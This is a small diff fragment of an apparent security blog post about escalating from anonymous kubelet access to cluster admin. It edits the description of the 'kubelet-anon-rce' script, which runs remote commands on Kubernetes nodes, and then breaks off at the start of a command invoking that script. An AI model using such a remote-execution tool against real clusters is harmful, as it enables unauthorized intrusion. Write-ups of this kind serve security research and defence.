serain/serain.github.io/_posts/2019-01-09-kubelet-from-anonymous-to-cluster-admin.markdown

 The request returns 302 redirect with a link to a stream that should be read with a websocket.

-The [`kubelet-anon-rce`](https://github.com/serain/kubelet-anon-rce) script automates both steps of running a command:
+The [`kubelet-anon-rce`](https://github.com/serain/kubelet-anon-rce) script automates issuing a command and streaming the response:

 ```
 $ python3 kubelet-anon-rce.py           \